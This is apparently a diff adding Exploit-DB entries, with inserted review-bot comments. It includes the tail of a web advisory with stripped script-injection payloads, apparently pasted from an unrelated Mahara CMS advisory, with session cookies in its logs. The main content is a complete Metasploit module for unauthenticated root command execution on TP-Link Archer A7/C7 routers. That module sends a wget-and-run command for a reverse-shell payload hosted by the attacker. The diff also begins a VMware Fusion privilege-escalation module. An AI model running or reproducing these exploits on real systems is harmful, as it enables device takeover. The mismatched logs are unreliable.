local ios device +3. Start the wifi share service in the application ui +4. Open the web-browser +5. Tamper the http requests +6. Prepare to upload any file and press the upload button +7. Inject as filename any html/js script code payload +8. 
Continue to transmit the POST method request +9. The file executes on the index listing on port 8881 +(http://localhost:8881/index.html) +10. Successful reproduce of the persistent script code injection web +vulnerability! + + +PoC: Exploitation +>" +>" + + + + +Carpeta: +>" +>" + + +>" >" + +20/04/2020 + + +
+... ... + +
+ + +--- PoC Session Logs [POST] --- (Mygroup Ficheros) +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------98107146915324237501974151621 +Content-Length: 4879 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& +files_filebrowser_edit_title=>" >"&files_filebrowser_edit_description=>" +>"&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& +files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& +files_filebrowser_edit_licensor=>" >"&files_filebrowser_edit_licensorurl=>" +>"&files_filebrowser_edit_allowcomments=on& +files_filebrowser_update[7191]=Guardar +cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 +- +POST: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: 
no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2- +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +- +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------126319663526561351602937008964 +Content-Length: 3721 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& +files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& +sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 +- +GET: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: 
+mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2 + + +Reference(s): +https://mahara_cms.localhost:8080/artefact/ +https://mahara_cms.localhost:8080/artefact/file/ +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/linux_mips/remote/48331.rb b/exploits/linux_mips/remote/48331.rb new file mode 100755 index 000000000..c4a71c239 --- /dev/null +++ b/exploits/linux_mips/remote/48331.rb 
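Review bot: The PoC Session Logs and Reference(s) sections describe a Mahara CMS instance (`https://mahara_cms.localhost:8080/artefact/file/groupfiles.php`, `sesskey=`, `files_filebrowser_*`, `pieform_*` fields) and have no connection to the Playable upload form on `localhost:8881` and listing on `localhost:80` that the Technical Details describe; they appear pasted from a different advisory and need to be replaced with the actual multipart `POST` to the Playable upload endpoint and the `GET /vid/<filename>` that triggers execution. The manual steps and the description also disagree on where the payload executes (`http://localhost:8881/index.html` in step 9 versus `localhost:80` in 1.1); state one, or both if both render it. The log also carries what look like live session identifiers (`mahara=82af10d7…`, `__cfduid=…`); redact them rather than publishing them. Without a matching request/response pair the "arbitrary file upload" claim in 1.2 rests only on the narrative and cannot be checked.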
@@ -0,0 +1,391 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'openssl' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::Remote::Udp + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'TP-Link Archer A7/C7 Unauthenticated LAN Remote Code Execution', + 'Description' => %q{ + This module exploits a command injection vulnerability in the tdpServer daemon (/usr/bin/tdpServer), running on + the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726. + The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does + not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command + as root, including downloading and executing a binary from another host. + This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + + Radek Domanski). 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Pedro Ribeiro ', # Vulnerability discovery and Metasploit module + 'Radek Domanski @RabbitPro' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'], + [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'], + [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'], + [ 'CVE', '2020-10882'], + [ 'CVE', '2020-10883'], + [ 'CVE', '2020-10884'], + [ 'ZDI', '20-334'], + [ 'ZDI', '20-335'], + [ 'ZDI', '20-336' ] + ], + 'Privileged' => true, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'Payload' => {}, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp', + 'WfsDelay' => 15, + }, + 'Targets' => + [ + [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ] + ], + 'DisclosureDate' => "Mar 25 2020", + 'DefaultTarget' => 0, + ) + ) + register_options( + [ + Opt::RPORT(20002) + ]) + + register_advanced_options( + [ + OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15]) + ]) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/webpages/app.1564127413977.manifest', + 'method' => 'GET', + 'rport' => 80 + }) + + if res && res.code == 200 + return Exploit::CheckCode::Vulnerable + end + rescue ::Rex::ConnectionError + pass + end + return Exploit::CheckCode::Unknown + end + + def calc_checksum(packet) + # reference table used to calculate the packet checksum + # used by tdpd_pkt_calc_checksum (0x4037f0) + # located at offset 0x0416e90 in the binary + reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee, + 0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4, + 0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 
0x88, 0x32, 0x79, + 0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c, + 0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d, + 0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41, + 0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83, + 0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9, + 0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa, + 0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10, + 0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b, + 0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8, + 0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32, + 0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d, + 0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf, + 0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95, + 0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6, + 0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c, + 0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01, + 0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85, + 0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78, + 0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98, + 0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6, + 0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30, + 0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82, + 0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9, + 
0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15, + 0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61, + 0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a, + 0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4, + 0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda, + 0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c, + 0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe, + 0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85, + 0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29, + 0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d, + 0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed, + 0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2, + 0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73, + 0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a, + 0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a, + 0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3, + 0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80, + 0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b, + 0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9, + 0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e, + 0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f, + 0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06, + 0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36, + 0x03, 0x4a, 0xf6, 
0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf, + 0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc, + 0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77, + 0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5, + 0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a, + 0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b, + 0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3, + 0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72, + 0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a, + 0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5, + 0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2, + 0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81, + 0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47, + 0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11, + 0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff, + 0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e, + 0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16, + 0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9, + 0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae, + 0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd, + 0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3, + 0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23, + 0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b, + 0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 
0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a, + 0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d] + + res = 0xffffffff + + # main checksum calculation + packet.each_entry { |c| + index = ((c ^ res) & 0xff) * 4 + # .reverse is needed as the target is big endian + ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first) + res = ref ^ (res >> 8) + } + + checksum = ~res + checksum_s = [(checksum)].pack('I>').force_encoding("ascii") + + # convert back to string + packet = packet.pack('C*').force_encoding('ascii') + + # and replace the checksum + packet[12] = checksum_s[0] + packet[13] = checksum_s[1] + packet[14] = checksum_s[2] + packet[15] = checksum_s[3] + + packet + end + + def aes_encrypt(plaintext) + # Function encrypts perfectly 16 bytes aligned payload + + if (plaintext.length % 16 != 0) + return + end + + cipher = OpenSSL::Cipher.new 'AES-128-CBC' + # in the original C code the key and IV are 256 bits long... but they still use AES-128 + iv = "1234567890abcdef" + key = "TPONEMESH_Kf!xn?" + encrypted = '' + cipher.encrypt + cipher.iv = iv + cipher.key = key + + # Take each 16 bytes block and encrypt it + plaintext.scan(/.{1,16}/) { |block| + encrypted += cipher.update(block) + } + + encrypted + end + + def create_injection(c) + # Template for the command injection + # The injection happens at "slave_mac" (read advisory for details) + # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions. + + # This will fail if we send a command with single quotes (') + # ... but that's not a problem for this module, since we don't use them for our command. + # It might also fail with double quotes (") since this will break the JSON... 
+ inject = "\';printf \'#{c}\'>>#{@cmd_file}\'" + + template = "{\"method\":\"slave_key_offer\",\"data\":{"\ + "\"group_id\":\"#{rand_text_numeric(1..3)}\","\ + "\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\ + "\"slave_mac\":\"%{INJECTION}\","\ + "\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\ + "\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\ + "\"want_to_join\":false,"\ + "\"model\":\"#{rand_text_alpha(5..13)}\","\ + "\"product_type\":\"#{rand_text_alpha(5..13)}\","\ + "\"operation_mode\":\"A%{PADDING}\"}}" + + # This is required to calculate exact template length without replace flags + template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length + # This has to be initialized to cover the situation when no padding is needed + pad = '' + padding = rand_text_alpha(16) + + template_len += inject.length + + # Calculate pad if padding is needed + if (template_len % 16 != 0) + pad = padding[0..15-(template_len % 16)] + end + + # Here the final payload is created + template % {INJECTION:"#{inject}", PADDING:"#{pad}"} + end + + def update_len_field(packet, payload_length) + new_packet = packet[0..3] + new_packet += [payload_length].pack("S>") + new_packet += packet[6..-1] + end + + def exec_cmd_file(packet) + # This function handles special action of exec + # Returns new complete tpdp packet + inject = "\';sh #{@cmd_file}\'" + payload = create_injection(inject) + + ciphertext = aes_encrypt(payload) + if not ciphertext + fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") + end + + new_packet = packet[0..15] + new_packet += ciphertext + new_packet = update_len_field(new_packet, ciphertext.length) + + calc_checksum(new_packet.bytes) + end + + # Handle incoming requests from the router + def on_request_uri(cli, request) + print_good("#{peer} - Sending executable to the router") + print_good("#{peer} - Sit back and relax, Shelly will come visit 
soon!") + send_response(cli, @payload_exe) + @payload_sent = true + end + + def exploit + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST") + end + + if datastore['SSL'] + fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it") + end + + print_status("Attempting to exploit #{target.name}") + + tpdp_packet_template = + [0x01].pack('C*') + # packet version, fixed to 1 + [0xf0].pack('C*') + # set packet type to 0xf0 (onemesh) + [0x07].pack('S>*') + # onemesh opcode, used by the onemesh_main switch table + [0x00].pack('S>*') + # packet len + [0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function + [0x00].pack('C*') + # dunno what this is + [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value + [0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder + + srv_host = datastore['SRVHOST'] + srv_port = datastore['SRVPORT'] + @cmd_file = rand_text_alpha_lower(1) + + # generate our payload executable + @payload_exe = generate_payload_exe + + # Command that will download @payload_exe and execute it + download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}" + + http_service = 'http://' + srv_host + ':' + srv_port.to_s + print_status("Starting up our web service on #{http_service} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => "/#{@cmd_file}" + }}) + + print_status("#{peer} - Connecting to the target") + connect_udp + + print_status("#{peer} - Sending command file byte by byte") + print_status("#{peer} - Command: #{download_cmd}") + mod = download_cmd.length / 5 + + download_cmd.each_char.with_index { |c, index| + # Generate payload + payload = create_injection(c) + if not payload + fail_with(Failure::Unknown, "#{peer} - Failed to setup 
download command!") + end + + # Encrypt payload + ciphertext = aes_encrypt(payload) + if not ciphertext + fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") + end + + tpdp_packet = tpdp_packet_template.dup + tpdp_packet += ciphertext + tpdp_packet = update_len_field(tpdp_packet, ciphertext.length) + tpdp_packet = calc_checksum(tpdp_packet.bytes) + + udp_sock.put(tpdp_packet) + + # Sleep to make sure the payload is processed by a target + Rex.sleep(1) + + # Print progress + if ((index+1) % mod == 0) + percentage = 20 * ((index+1) / mod) + # very advanced mathemathics in use here to show the progress bar + print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]") + if percentage == 100 + # a bit of cheating to get the last char done right + index = -2 + end + #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}") + end + } + + # Send the exec command. From here we should receive the connection + print_status("#{peer} - Command file sent, attempting to execute...") + tpdp_packet = exec_cmd_file(tpdp_packet_template.dup) + udp_sock.put(tpdp_packet) + + timeout = 0 + while not @payload_sent + Rex.sleep(1) + timeout += 1 + if timeout == datastore['MAX_WAIT'].to_i + fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(") + end + end + + disconnect_udp + end +end \ No newline at end of file diff --git a/exploits/macos/local/48337.rb b/exploits/macos/local/48337.rb new file mode 100755 index 000000000..ceca93f31 --- /dev/null +++ b/exploits/macos/local/48337.rb 
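Review bot: `pass` in the `rescue ::Rex::ConnectionError` branch of `check` is not Ruby — it is a bare identifier, so a refused or timed-out connection raises a NameError instead of falling through to `return Exploit::CheckCode::Unknown`; replace the line with `nil` or simply delete it. In the same method, an HTTP 200 for the static `/webpages/app.1564127413977.manifest` path only shows that the web UI is present, not that this firmware is affected, so returning `Exploit::CheckCode::Vulnerable` overstates the result and `Exploit::CheckCode::Detected` (or `Appears`) matches the framework's convention better. In `exploit`, `index = -2` inside the `each_char.with_index` block only rebinds the block parameter and the `print_status` it was written for is commented out, so both lines are dead and can be removed together.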
@@ -0,0 +1,240 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::OSX::Priv + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation', + 'Description' => %q( + This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3. + The Open VMware USB Arbitrator Service can be launched outide of its standard path + which allows loading of an attacker controlled binary. By creating a payload in the + user home directory in a specific folder, and creating a hard link to the 'Open VMware + USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload + with an effective UID of 0. + @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race. + Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3. 
+ ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'h00die', # msf module + 'Dhanesh Kizhakkinan', # discovery + 'Rich Mirch', # edb module + 'jeffball ', # 11.5.3 exploit + 'grimm' + ], + 'Platform' => [ 'osx' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'CVE', '2020-3950' ], + [ 'EDB', '48235' ], + [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ], + [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ], + [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ] + ], + 'DisclosureDate' => 'Mar 17 2020', + 'DefaultOptions' => + { + 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', + 'WfsDelay' => 15 + } + ) + ) + + register_options [ + OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75]) + ] + + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ] + end + + def open_usb_service + 'Open VMware USB Arbitrator Service' + end + + def usb_service + 'VMware USB Arbitrator Service' + end + + def get_home_dir + home = cmd_exec 'echo ~' + if home.blank? + fail_with Failure::BadConfig, 'Unable to determine home dir for shell.' + end + home + end + + def content_dir + 